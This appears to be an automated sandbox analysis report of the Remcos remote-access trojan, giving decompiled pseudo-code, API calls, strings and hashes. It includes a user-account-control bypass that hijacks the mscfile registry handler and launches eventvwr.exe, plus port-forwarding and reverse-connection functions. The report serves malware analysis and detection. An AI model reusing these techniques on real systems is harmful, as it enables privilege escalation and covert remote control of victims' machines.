                                                                                                					_t65 =  *0x46dd2c(_t61, E004374E4(_t62, E00401F87(E00401E3B( &_v92, _t111, __eflags, 0))) & 0x0000ffff);
                                                                                                					__eflags = _t65;
                                                                                                					_t109 =  !=  ? 1 :  *0x46dd41 & 0x000000ff;
                                                                                                					 *0x46dd41 =  !=  ? 1 :  *0x46dd41 & 0x000000ff;
                                                                                                					_t112 = _t65;
                                                                                                					E00417C16(0x46e250, _t140 - 0x10, _t65);
                                                                                                					_push(0x78);
                                                                                                					goto L10;
                                                                                                				}
                                                                                                				_t133 = _t131 - 1;
                                                                                                				if(_t133 == 0) {
                                                                                                					_t58 =  *0x46dd34();
                                                                                                					_t144 = _t140 - 0x18;
                                                                                                					goto L9;
                                                                                                				}
                                                                                                				if(_t133 == 1) {
                                                                                                					 *0x46dd3c();
                                                                                                					 *0x46dd41 = 0;
                                                                                                				}
                                                                                                				goto L20;
                                                                                                			}







































                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Eventinet_ntoa
                                                                                                • String ID: GetDirectListeningPort$PF$StartForward$StartReverse$StopForward$StopReverse
                                                                                                • API String ID: 3578746661-1619240785
                                                                                                • Opcode ID: 90221b745ea4a08f8010f153d8bfae99a331e0b8465794eba684ab4e2742cb7b
                                                                                                • Instruction ID: bb15008153ed0e76a39fefa845b0c1b7df9a4d60d797f4aadd8c8bc5d4cf133f
                                                                                                • Opcode Fuzzy Hash: 90221b745ea4a08f8010f153d8bfae99a331e0b8465794eba684ab4e2742cb7b
                                                                                                • Instruction Fuzzy Hash: B351A671F042009BC614BB35D85AA6E36A55B85348F40453FF842A76E2EF7C9D09C78F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E00411F62(void* __ecx, char _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed char _a28) {
                                                                                                				short _v8;
                                                                                                				long _v12;
                                                                                                				long _t38;
                                                                                                				short _t39;
                                                                                                				void* _t40;
                                                                                                				void* _t41;
                                                                                                				signed short _t43;
                                                                                                				intOrPtr* _t44;
                                                                                                				intOrPtr _t45;
                                                                                                				void* _t47;
                                                                                                				void* _t48;
                                                                                                				char* _t50;
                                                                                                				intOrPtr _t57;
                                                                                                				signed char _t61;
                                                                                                				intOrPtr _t63;
                                                                                                				intOrPtr* _t64;
                                                                                                				signed short _t69;
                                                                                                				intOrPtr* _t70;
                                                                                                				intOrPtr _t72;
                                                                                                				void* _t73;
                                                                                                				void* _t74;
                                                                                                				intOrPtr* _t75;
                                                                                                				intOrPtr _t78;
                                                                                                				intOrPtr* _t80;
                                                                                                				intOrPtr* _t82;
                                                                                                				void* _t83;
                                                                                                
                                                                                                				_t38 =  *"65535"; // 0x33353536
                                                                                                				_t80 = _a4;
                                                                                                				_v12 = _t38;
                                                                                                				_t39 =  *0x466898; // 0x35
                                                                                                				_v8 = _t39;
                                                                                                				if(_t80 == 0 || _a8 < 0x10) {
                                                                                                					L46:
                                                                                                					_t40 = 0x2afb;
                                                                                                					goto L47;
                                                                                                				} else {
                                                                                                					_t41 = 2;
                                                                                                					if( *_t80 == _t41) {
                                                                                                						_t63 = _a24;
                                                                                                						_t72 = _a20;
                                                                                                						_t78 = _a16;
                                                                                                						if(_a12 == 0 || _t78 == 0) {
                                                                                                							if(_t72 == 0 || _t63 == 0) {
                                                                                                								_t40 = 0x2af9;
                                                                                                								goto L47;
                                                                                                							} else {
                                                                                                								goto L8;
                                                                                                							}
                                                                                                						} else {
                                                                                                							L8:
                                                                                                							_t61 = _a28;
                                                                                                							_t43 = _t61 & 0x00000006;
                                                                                                							if(_t43 != 6) {
                                                                                                								if(_t72 == 0 || _t63 == 0) {
                                                                                                									L23:
                                                                                                									if(_a12 == 0 || _t78 == 0) {
                                                                                                										L44:
                                                                                                										_t40 = 0;
                                                                                                										goto L47;
                                                                                                									} else {
                                                                                                										_t44 =  *((intOrPtr*)(_t80 + 4));
                                                                                                										_a4 = _t44;
                                                                                                										if((_t61 & 0x00000002) == 0) {
                                                                                                											_t44 =  &_a4;
                                                                                                											__imp__#51(_t44, 4, 2);
                                                                                                											if(_t44 == 0) {
                                                                                                												L32:
                                                                                                												if((_t61 & 0x00000004) == 0) {
                                                                                                													_push(_a4);
                                                                                                													L39:
                                                                                                													__imp__#12();
                                                                                                													_t82 = _t44;
                                                                                                													L40:
                                                                                                													_t64 = _t82;
                                                                                                													_t36 = _t64 + 1; // 0x1
                                                                                                													_t73 = _t36;
                                                                                                													do {
                                                                                                														_t45 =  *_t64;
                                                                                                														_t64 = _t64 + 1;
                                                                                                													} while (_t45 != 0);
                                                                                                													if(_t78 <= _t64 - _t73) {
                                                                                                														goto L46;
                                                                                                													}
                                                                                                													E0043CAAC(_a12, _t78, _t82);
                                                                                                													goto L44;
                                                                                                												}
                                                                                                												__imp__#111();
                                                                                                												_t47 = _t44 - 0x2af9;
                                                                                                												if(_t47 == 0) {
                                                                                                													L36:
                                                                                                													_t40 = 0x2af9;
                                                                                                													goto L47;
                                                                                                												}
                                                                                                												_t48 = _t47 - 1;
                                                                                                												if(_t48 == 0) {
                                                                                                													_t40 = 0x2afa;
                                                                                                													goto L47;
                                                                                                												}
                                                                                                												if(_t48 == 1) {
                                                                                                													goto L46;
                                                                                                												}
                                                                                                												goto L36;
                                                                                                											}
                                                                                                											_t82 =  *_t44;
                                                                                                											if(_t82 == 0) {
                                                                                                												goto L32;
                                                                                                											}
                                                                                                											if((_t61 & 0x00000001) != 0) {
                                                                                                												_t50 = E004118EF(_t82, 0x2e);
                                                                                                												if(_t50 != 0) {
                                                                                                													 *_t50 = 0;
                                                                                                												}
                                                                                                											}
                                                                                                											goto L40;
                                                                                                										}
                                                                                                										_push(_t44);
                                                                                                										goto L39;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t69 =  *(_t80 + 2) & 0x0000ffff;
                                                                                                									_a8 = _t69;
                                                                                                									if((_t61 & 0x00000008) == 0) {
                                                                                                										_t74 = 0;
                                                                                                										_t52 =  ==  ? _t74 : "udp";
                                                                                                										_t43 = _t69 & 0x0000ffff;
                                                                                                										__imp__#56(_t43,  ==  ? _t74 : "udp");
                                                                                                										if(_t43 == 0 ||  *_t43 == 0) {
                                                                                                											_push(_a8);
                                                                                                											L18:
                                                                                                											__imp__#15();
                                                                                                											swprintf( &_v12, 6, "%u", _t43 & 0x0000ffff);
                                                                                                											_t75 =  &_v12;
                                                                                                											_t83 = _t83 + 0x10;
                                                                                                											goto L19;
                                                                                                										} else {
                                                                                                											_t75 =  *_t43;
                                                                                                											L19:
                                                                                                											_t70 = _t75;
                                                                                                											_a8 = _t70 + 1;
                                                                                                											do {
                                                                                                												_t57 =  *_t70;
                                                                                                												_t70 = _t70 + 1;
                                                                                                											} while (_t57 != 0);
                                                                                                											if(_a24 <= _t70 - _a8) {
                                                                                                												goto L46;
                                                                                                											}
                                                                                                											E0043CAAC(_a20, _a24, _t75);
                                                                                                											_t83 = _t83 + 0xc;
                                                                                                											goto L23;
                                                                                                										}
                                                                                                									}
                                                                                                									_push(_t69);
                                                                                                									goto L18;
                                                                                                								}
                                                                                                							}
                                                                                                							_t40 = 0x2726;
                                                                                                							goto L47;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t40 = 0x273f;
                                                                                                						L47:
                                                                                                						return _t40;
                                                                                                					}
                                                                                                				}
                                                                                                			}

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 65535$udp
                                                                                                • API String ID: 0-1267037602
                                                                                                • Opcode ID: e902066c9ec7ebc4875e4e234c969e16d71dd7dcd59d5c1f52b40557385198f6
                                                                                                • Instruction ID: 99b905821392987c4229e0bc93f34ab7e78062dc25839c6468b263b2a361e60f
                                                                                                • Opcode Fuzzy Hash: e902066c9ec7ebc4875e4e234c969e16d71dd7dcd59d5c1f52b40557385198f6
                                                                                                • Instruction Fuzzy Hash: 1751E034600205ABDB259E28CA05BFB3B65AB49300F14822BFE01D7392D7BDCCE1D75A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 75%
                                                                                                			E00406114(void* __ebx, void* __ecx, void* __edx) {
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				void* _t8;
                                                                                                				void* _t10;
                                                                                                				void* _t11;
                                                                                                				void* _t12;
                                                                                                				void* _t14;
                                                                                                				void* _t21;
                                                                                                				void* _t24;
                                                                                                				void* _t28;
                                                                                                				void* _t50;
                                                                                                
                                                                                                				_t28 = __ecx;
                                                                                                				if( *0x46c9c0 != 0) {
                                                                                                					return 1;
                                                                                                				}
                                                                                                				_t8 = E004062B2(__ecx);
                                                                                                				__eflags = _t8 - 0x3a9f;
                                                                                                				if(_t8 < 0x3a9f) {
                                                                                                					_push(_t28);
                                                                                                					E00410911( &_v28, 0x80000000, "mscfile\\shell\\open\\command", 0x460734);
                                                                                                					_t10 = E0040247B();
                                                                                                					_t11 = E00401F87(0x46e5f0);
                                                                                                					_t12 = E0040247B();
                                                                                                					_t14 = E00401F87( &_v28);
                                                                                                					E00410CAF(E00401F87(0x46e5a8), __eflags, "origmsc", _t14, _t12 + 1, _t11, _t10);
                                                                                                					_push(2);
                                                                                                					E00404260(__ebx, _t50 + 0x18 - 0x18, "C:\Users\jones\AppData\Local\Temp\rem9090sta.exe");
                                                                                                					_push(0x46079c);
                                                                                                					E00410B7B(0x80000001, L"Software\\Classes\\mscfile\\shell\\open\\command");
                                                                                                					E004189FF( &_v52, 0x34, "eventvwr.exe");
                                                                                                					_t21 = ShellExecuteW(0, L"open", E00401EDD( &_v52), 0x46079c, 0x46079c, 0);
                                                                                                					__eflags = _t21 - 0x20;
                                                                                                					if(_t21 <= 0x20) {
                                                                                                						E00401EE2();
                                                                                                						E00401FB9();
                                                                                                						_t24 = 2;
                                                                                                						return _t24;
                                                                                                					}
                                                                                                					ExitProcess(0);
                                                                                                				}
                                                                                                				return _t8;
                                                                                                			}















                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,0046079C,0046079C,00000000), ref: 004061E3
                                                                                                • ExitProcess.KERNEL32 ref: 004061F0
                                                                                                Strings
                                                                                                • Software\Classes\mscfile\shell\open\command, xrefs: 004061AD
                                                                                                • eventvwr.exe, xrefs: 004061BD
                                                                                                • open, xrefs: 004061DC
                                                                                                • origmsc, xrefs: 0040617E
                                                                                                • mscfile\shell\open\command, xrefs: 00406142
                                                                                                • C:\Users\user\AppData\Local\Temp\rem9090sta.exe, xrefs: 0040619E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteExitProcessShell
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\rem9090sta.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                                                                • API String ID: 1124553745-1559938852
                                                                                                • Opcode ID: 90f2d167bed2b7ead40d1ddbcbca90368d114b847a1bcc328c62f1c577000627
                                                                                                • Instruction ID: 00780d1abf4c5647e31898de684db1996746f1de8a9c6afd1ab4477203dec792
                                                                                                • Opcode Fuzzy Hash: 90f2d167bed2b7ead40d1ddbcbca90368d114b847a1bcc328c62f1c577000627
                                                                                                • Instruction Fuzzy Hash: 7811F371A4410566D604B2A6CC57FBF32589B01709F20043FF907BA1D2FEBC588186DE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00419787(void* __eflags) {
                                                                                                				struct tagMSG _v32;
                                                                                                				char _v300;
                                                                                                				int _t14;
                                                                                                
                                                                                                				GetModuleFileNameA(0,  &_v300, 0x104);
                                                                                                				 *0x46deb4 = E00419839();
                                                                                                				0x46deb0->cbSize = 0x1fc;
                                                                                                				 *0x46deb8 = 1;
                                                                                                				 *0x46dec0 = 0x401;
                                                                                                				 *0x46dec4 = ExtractIconA(0,  &_v300, 0);
                                                                                                				lstrcpynA(0x46dec8, "Remcos", 0x80);
                                                                                                				 *0x46debc = 7;
                                                                                                				Shell_NotifyIconA(0, 0x46deb0);
                                                                                                				while(1) {
                                                                                                					_t14 = GetMessageA( &_v32, 0, 0, 0);
                                                                                                					if(_t14 == 0) {
                                                                                                						break;
                                                                                                					}
                                                                                                					TranslateMessage( &_v32);
                                                                                                					DispatchMessageA( &_v32);
                                                                                                				}
                                                                                                				return _t14;
                                                                                                			}







                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004197A0
                                                                                                  • Part of subcall function 00419839: RegisterClassExA.USER32(00000030), ref: 00419885
                                                                                                  • Part of subcall function 00419839: CreateWindowExA.USER32 ref: 004198A0
                                                                                                  • Part of subcall function 00419839: GetLastError.KERNEL32 ref: 004198AA
                                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 004197D7
                                                                                                • lstrcpynA.KERNEL32(0046DEC8,Remcos,00000080), ref: 004197F1
                                                                                                • Shell_NotifyIconA.SHELL32(00000000,0046DEB0), ref: 00419807
                                                                                                • TranslateMessage.USER32(?), ref: 00419813
                                                                                                • DispatchMessageA.USER32 ref: 0041981D
                                                                                                • GetMessageA.USER32 ref: 0041982A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                • String ID: Remcos
                                                                                                • API String ID: 1970332568-165870891
                                                                                                • Opcode ID: 05e4fb422e645131e176b4b0144c3208770c34772ffe40a69905eb6f47256127
                                                                                                • Instruction ID: b76965e78c36f775c0f56356684f8a08056b97e096fc346de85457ae77bda11a
                                                                                                • Opcode Fuzzy Hash: 05e4fb422e645131e176b4b0144c3208770c34772ffe40a69905eb6f47256127
                                                                                                • Instruction Fuzzy Hash: A8015EB1E04305ABD7109FA1ED0CE9B7BBCBBD5B0AF00002AF5019A161E7F9A485CB59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 77%
                                                                                                			E00447787(signed int _a4, void* _a8, unsigned int _a12) {
                                                                                                				signed int _v5;
                                                                                                				char _v6;
                                                                                                				void* _v12;
                                                                                                				unsigned int _v16;
                                                                                                				signed int _v20;
                                                                                                				signed int _v24;
                                                                                                				signed int _v28;
                                                                                                				void* _v32;
                                                                                                				long _v36;
                                                                                                				void* _v40;
                                                                                                				long _v44;
                                                                                                				signed int* _t143;
                                                                                                				signed int _t145;
                                                                                                				intOrPtr _t149;
                                                                                                				signed int _t153;
                                                                                                				signed int _t155;
                                                                                                				signed char _t157;
                                                                                                				unsigned int _t158;
                                                                                                				intOrPtr _t162;
                                                                                                				void* _t163;
                                                                                                				signed int _t164;
                                                                                                				signed int _t167;
                                                                                                				long _t168;
                                                                                                				intOrPtr _t175;
                                                                                                				signed int _t176;
                                                                                                				intOrPtr _t178;
                                                                                                				signed int _t180;
                                                                                                				signed int _t184;
                                                                                                				char _t191;
                                                                                                				char* _t192;
                                                                                                				char _t199;
                                                                                                				char* _t200;
                                                                                                				signed char _t211;
                                                                                                				signed int _t213;
                                                                                                				long _t215;
                                                                                                				signed int _t216;
                                                                                                				char _t218;
                                                                                                				signed char _t222;
                                                                                                				signed int _t223;
                                                                                                				unsigned int _t224;
                                                                                                				intOrPtr _t225;
                                                                                                				unsigned int _t229;
                                                                                                				signed int _t231;
                                                                                                				signed int _t232;
                                                                                                				signed int _t233;
                                                                                                				signed int _t234;
                                                                                                				signed int _t235;
                                                                                                				signed char _t236;
                                                                                                				signed int _t237;
                                                                                                				signed int _t239;
                                                                                                				signed int _t240;
                                                                                                				signed int _t241;
                                                                                                				signed int _t242;
                                                                                                				signed int _t246;
                                                                                                				void* _t248;
                                                                                                				void* _t249;
                                                                                                
                                                                                                				_t213 = _a4;
                                                                                                				if(_t213 != 0xfffffffe) {
                                                                                                					__eflags = _t213;
                                                                                                					if(_t213 < 0) {
                                                                                                						L58:
                                                                                                						_t143 = E0043891F();
                                                                                                						 *_t143 =  *_t143 & 0x00000000;
                                                                                                						__eflags =  *_t143;
                                                                                                						 *((intOrPtr*)(E00438932())) = 9;
                                                                                                						L59:
                                                                                                						_t145 = E00437709();
                                                                                                						goto L60;
                                                                                                					}
                                                                                                					__eflags = _t213 -  *0x46da00; // 0x40
                                                                                                					if(__eflags >= 0) {
                                                                                                						goto L58;
                                                                                                					}
                                                                                                					_v24 = 1;
                                                                                                					_t239 = _t213 >> 6;
                                                                                                					_t235 = (_t213 & 0x0000003f) * 0x30;
                                                                                                					_v20 = _t239;
                                                                                                					_t149 =  *((intOrPtr*)(0x46d800 + _t239 * 4));
                                                                                                					_v28 = _t235;
                                                                                                					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                                                                                                					_v5 = _t222;
                                                                                                					__eflags = _t222 & 0x00000001;
                                                                                                					if((_t222 & 0x00000001) == 0) {
                                                                                                						goto L58;
                                                                                                					}
                                                                                                					_t223 = _a12;
                                                                                                					__eflags = _t223 - 0x7fffffff;
                                                                                                					if(_t223 <= 0x7fffffff) {
                                                                                                						__eflags = _t223;
                                                                                                						if(_t223 == 0) {
                                                                                                							L57:
                                                                                                							return 0;
                                                                                                						}
                                                                                                						__eflags = _v5 & 0x00000002;
                                                                                                						if((_v5 & 0x00000002) != 0) {
                                                                                                							goto L57;
                                                                                                						}
                                                                                                						__eflags = _a8;
                                                                                                						if(_a8 == 0) {
                                                                                                							goto L6;
                                                                                                						}
                                                                                                						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                                                                                                						_v5 = _t153;
                                                                                                						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                                                                                                						_t246 = 0;
                                                                                                						_t155 = _t153 - 1;
                                                                                                						__eflags = _t155;
                                                                                                						if(_t155 == 0) {
                                                                                                							_t236 = _v24;
                                                                                                							_t157 =  !_t223;
                                                                                                							__eflags = _t236 & _t157;
                                                                                                							if((_t236 & _t157) != 0) {
                                                                                                								_t158 = 4;
                                                                                                								_t224 = _t223 >> 1;
                                                                                                								_v16 = _t158;
                                                                                                								__eflags = _t224 - _t158;
                                                                                                								if(_t224 >= _t158) {
                                                                                                									_t158 = _t224;
                                                                                                									_v16 = _t224;
                                                                                                								}
                                                                                                								_t246 = E00440C6C(_t224, _t158);
                                                                                                								E004414D5(0);
                                                                                                								E004414D5(0);
                                                                                                								_t249 = _t248 + 0xc;
                                                                                                								_v12 = _t246;
                                                                                                								__eflags = _t246;
                                                                                                								if(_t246 != 0) {
                                                                                                									_t162 = E00446077(_t213, 0, 0, _v24);
                                                                                                									_t225 =  *((intOrPtr*)(0x46d800 + _t239 * 4));
                                                                                                									_t248 = _t249 + 0x10;
                                                                                                									_t240 = _v28;
                                                                                                									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                                                                                                									_t163 = _t246;
                                                                                                									 *(_t240 + _t225 + 0x24) = _t236;
                                                                                                									_t235 = _t240;
                                                                                                									_t223 = _v16;
                                                                                                									L21:
                                                                                                									_t241 = 0;
                                                                                                									_v40 = _t163;
                                                                                                									_t215 =  *((intOrPtr*)(0x46d800 + _v20 * 4));
                                                                                                									_v36 = _t215;
                                                                                                									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                                                                                                									_t216 = _a4;
                                                                                                									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                                                                                                										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                                                                                                										_v6 = _t218;
                                                                                                										__eflags = _t218 - 0xa;
                                                                                                										_t216 = _a4;
                                                                                                										if(_t218 != 0xa) {
                                                                                                											__eflags = _t223;
                                                                                                											if(_t223 != 0) {
                                                                                                												_t241 = _v24;
                                                                                                												 *_t163 = _v6;
                                                                                                												_t216 = _a4;
                                                                                                												_t232 = _t223 - 1;
                                                                                                												__eflags = _v5;
                                                                                                												_v12 = _t163 + 1;
                                                                                                												_v16 = _t232;
                                                                                                												 *((char*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2a)) = 0xa;
                                                                                                												if(_v5 != 0) {
                                                                                                													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2b));
                                                                                                													_v6 = _t191;
                                                                                                													__eflags = _t191 - 0xa;
                                                                                                													if(_t191 != 0xa) {
                                                                                                														__eflags = _t232;
                                                                                                														if(_t232 != 0) {
                                                                                                															_t192 = _v12;
                                                                                                															_t241 = 2;
                                                                                                															 *_t192 = _v6;
                                                                                                															_t216 = _a4;
                                                                                                															_t233 = _t232 - 1;
                                                                                                															_v12 = _t192 + 1;
                                                                                                															_v16 = _t233;
                                                                                                															 *((char*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2b)) = 0xa;
                                                                                                															__eflags = _v5 - _v24;
                                                                                                															if(_v5 == _v24) {
                                                                                                																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2c));
                                                                                                																_v6 = _t199;
                                                                                                																__eflags = _t199 - 0xa;
                                                                                                																if(_t199 != 0xa) {
                                                                                                																	__eflags = _t233;
                                                                                                																	if(_t233 != 0) {
                                                                                                																		_t200 = _v12;
                                                                                                																		_t241 = 3;
                                                                                                																		 *_t200 = _v6;
                                                                                                																		_t216 = _a4;
                                                                                                																		_t234 = _t233 - 1;
                                                                                                																		__eflags = _t234;
                                                                                                																		_v12 = _t200 + 1;
                                                                                                																		_v16 = _t234;
                                                                                                																		 *((char*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2c)) = 0xa;
                                                                                                																	}
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                									_t164 = E0044E800(_t216);
                                                                                                									__eflags = _t164;
                                                                                                									if(_t164 == 0) {
                                                                                                										L41:
                                                                                                										_v24 = 0;
                                                                                                										L42:
                                                                                                										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
                                                                                                										__eflags = _t167;
                                                                                                										if(_t167 == 0) {
                                                                                                											L53:
                                                                                                											_t168 = GetLastError();
                                                                                                											_t241 = 5;
                                                                                                											__eflags = _t168 - _t241;
                                                                                                											if(_t168 != _t241) {
                                                                                                												__eflags = _t168 - 0x6d;
                                                                                                												if(_t168 != 0x6d) {
                                                                                                													L37:
                                                                                                													E004388FC(_t168);
                                                                                                													goto L38;
                                                                                                												}
                                                                                                												_t242 = 0;
                                                                                                												goto L39;
                                                                                                											}
                                                                                                											 *((intOrPtr*)(E00438932())) = 9;
                                                                                                											 *(E0043891F()) = _t241;
                                                                                                											goto L38;
                                                                                                										}
                                                                                                										_t229 = _a12;
                                                                                                										__eflags = _v36 - _t229;
                                                                                                										if(_v36 > _t229) {
                                                                                                											goto L53;
                                                                                                										}
                                                                                                										_t242 = _t241 + _v36;
                                                                                                										__eflags = _t242;
                                                                                                										L45:
                                                                                                										_t237 = _v28;
                                                                                                										_t175 =  *((intOrPtr*)(0x46d800 + _v20 * 4));
                                                                                                										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                                                                                                										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                                                                                                											__eflags = _v5 - 2;
                                                                                                											if(_v5 == 2) {
                                                                                                												__eflags = _v24;
                                                                                                												_push(_t242 >> 1);
                                                                                                												_push(_v40);
                                                                                                												_push(_t216);
                                                                                                												if(_v24 == 0) {
                                                                                                													_t176 = E004472E3();
                                                                                                												} else {
                                                                                                													_t176 = E004475F3();
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t230 = _t229 >> 1;
                                                                                                												__eflags = _t229 >> 1;
                                                                                                												_t176 = E004474A3(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                                                                                                											}
                                                                                                											_t242 = _t176;
                                                                                                										}
                                                                                                										goto L39;
                                                                                                									}
                                                                                                									_t231 = _v28;
                                                                                                									_t178 =  *((intOrPtr*)(0x46d800 + _v20 * 4));
                                                                                                									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                                                                                                									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                                                                                                										goto L41;
                                                                                                									}
                                                                                                									_t180 = GetConsoleMode(_v32,  &_v44);
                                                                                                									__eflags = _t180;
                                                                                                									if(_t180 == 0) {
                                                                                                										goto L41;
                                                                                                									}
                                                                                                									__eflags = _v5 - 2;
                                                                                                									if(_v5 != 2) {
                                                                                                										goto L42;
                                                                                                									}
                                                                                                									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                                                                                                									__eflags = _t184;
                                                                                                									if(_t184 != 0) {
                                                                                                										_t229 = _a12;
                                                                                                										_t242 = _t241 + _v36 * 2;
                                                                                                										goto L45;
                                                                                                									}
                                                                                                									_t168 = GetLastError();
                                                                                                									goto L37;
                                                                                                								} else {
                                                                                                									 *((intOrPtr*)(E00438932())) = 0xc;
                                                                                                									 *(E0043891F()) = 8;
                                                                                                									L38:
                                                                                                									_t242 = _t241 | 0xffffffff;
                                                                                                									__eflags = _t242;
                                                                                                									L39:
                                                                                                									E004414D5(_t246);
                                                                                                									return _t242;
                                                                                                								}
                                                                                                							}
                                                                                                							L15:
                                                                                                							 *(E0043891F()) =  *_t206 & _t246;
                                                                                                							 *((intOrPtr*)(E00438932())) = 0x16;
                                                                                                							E00437709();
                                                                                                							goto L38;
                                                                                                						}
                                                                                                						__eflags = _t155 != 1;
                                                                                                						if(_t155 != 1) {
                                                                                                							L13:
                                                                                                							_t163 = _a8;
                                                                                                							_v16 = _t223;
                                                                                                							_v12 = _t163;
                                                                                                							goto L21;
                                                                                                						}
                                                                                                						_t211 =  !_t223;
                                                                                                						__eflags = _t211 & 0x00000001;
                                                                                                						if((_t211 & 0x00000001) == 0) {
                                                                                                							goto L15;
                                                                                                						}
                                                                                                						goto L13;
                                                                                                					}
                                                                                                					L6:
                                                                                                					 *(E0043891F()) =  *_t151 & 0x00000000;
                                                                                                					 *((intOrPtr*)(E00438932())) = 0x16;
                                                                                                					goto L59;
                                                                                                				} else {
                                                                                                					 *(E0043891F()) =  *_t212 & 0x00000000;
                                                                                                					_t145 = E00438932();
                                                                                                					 *_t145 = 9;
                                                                                                					L60:
                                                                                                					return _t145 | 0xffffffff;
                                                                                                				}
                                                                                                			}

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9707cf7ddd85aead171221ae991c07f839ef619f6c5e2e690b7711ca268e16d9
                                                                                                • Instruction ID: 08eb86ec9ad85731d69af5e0a0c51ba89f0cefce29c5b426659fc6cf62c0fbd6
                                                                                                • Opcode Fuzzy Hash: 9707cf7ddd85aead171221ae991c07f839ef619f6c5e2e690b7711ca268e16d9
                                                                                                • Instruction Fuzzy Hash: ECC11C70E083499FEF11DFA9C845BBEBBB1BF09314F14405AE450AB392D7789942CB69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

